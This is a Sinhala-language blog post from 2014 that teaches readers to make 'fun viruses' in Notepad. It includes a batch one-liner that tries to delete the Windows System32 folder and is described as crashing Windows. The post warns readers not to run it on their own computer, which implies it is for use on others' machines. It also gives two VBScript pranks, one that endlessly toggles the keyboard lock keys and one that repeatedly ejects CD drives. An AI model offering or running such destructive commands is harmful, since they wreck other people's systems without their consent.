කට්ටිය ජෝලියටත් එක්ක fun virus ටිකක් හදමුද? - Aluth Tricks - අලුත් ට්‍රික්ස්

Saturday, August 2, 2014

කට්ටිය ජෝලියටත් එක්ක fun virus ටිකක් හදමුද?

<<<<<< පොඩි ඒත් ටිකක් භයානක VIRUS එකක් හදමුද…..? >>>>>>>

                                    

  
මේක පොඩි සරල Code එකක්.Note Pad එක අරගෙන පහල තියන Code එක Type කරගන්නකො

****මේක බැරිවෙලාවත් ඔයාගෙ පරිගණකයේනම් Run කරන්න එපා****
@echo off del c:\windows\system32
 
        
ඒක ඔයාල කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියල දෙන්න ඕන. 
Eg: virus.bat

****මේක බැරිවෙලාවත් ඔයාගෙ පරිගණකයේනම් Run කරන්න එපා****
මේකෙන් ඔයාගෙ පරිගණකයේ System 32 File එක Delete කරනවා.Windows Crash වෙනවා.
<<<<<<<<<< යාළුවො ටිකක් රත් වෙන FUN VIRUS එකක් හදමුද…?>>>>>>>>>


                                        

        
බය වෙන්න එපා මේවා ඇත්ත වෛරස් නෙමේ  Fun Virus.මේවයින් පරිගණකයට කිසිම හානියක් වෙන්නෙ නෑ.අපි බලමු මේක කොහොමද හදන්නෙ කියලා

♦  
මුලින්ම Note Pad එක Open කරගෙන පහලින් දීල තියන Code ටික Type කරගන්නකෝ.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
♦  දැන් ඕක තමන්ට කැමති නමකින් Save කරගන්න.හැබැයි නමේ අගට .vbs කියල දෙන්න ඕනෙ.
♦  දැන් ඉතින් Save කරපු .vbs File එක Double Click කරල බලන්නකෝ ඔයාලගෙ Key Board එකේ Num Lock, Caps Lock, Scroll Lock Button 3 දිහා පිස්සු නටනව නේද කියලා
          දැන් මේක නවත්තගන්න ඕනි උනාම Task Manager (Ctrl+Alt+Delete) එක Open කරගෙන ඒකෙ Run වෙන WSCRIPT.EXEFile එක හොයල End Task කරන්න.එතකොට වැඩේ හරි.

<<<<<<<<<<<<< FUN VIRUS එකක් හදමු…. >>>>>>>>>>>>>>>>>

                                                   
                                                                    

 මම දැන් කියල දෙන්න හදන්නෙ පරිගණකයට කිසිම හානියක් වෙන්නෙ නැති වෛරස් එකක් හදන විදිය.ඇත්තටම මේක ආතල් වෛරස් එකක්.අපි බලමු කොහොමද මේක හදන්නෙ කියලා.

♦  
මුලින්ම Note Pad එක විවෘත කරගෙන පහල තියන Code එක Type කරන්න.නැත්තම් Copy කරල Paste කරගන්න.
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >=1 then
do
For i=0 to colCDROMs.COunt -1
colCDROMs.item(i).Eject
Next ‘cdrom
For i=0 to colCDROMs.COunt -1
colCDROMs.item(i).Eject
Next ‘cdrom
loop
End if
♦  දැන් ඕක ඔයාල කැමති තැනකින් Save කරන්න.File Extension එක .vbs කියල දෙන්න අමතක කරන්න එපා.දැන් Save කරපු File එක Open කරල බලන්නකෝ CD Rom එකට වෙන දේ……….
          එහෙම වෙන එක නවත්තගන්න (Ctrl+Alt+Delete) Task Manager Open කරගෙන එකෙ Run වෙන WSCRIPT.EXE කියන File එක හොයල End Task කරන්න.වැඩි දෙයක් නෑ.
හොඳ නරක කියල Comment එකක් දාල යන්නත් අමතක කරන්න එපා හොඳද……?


No comments:

Post a Comment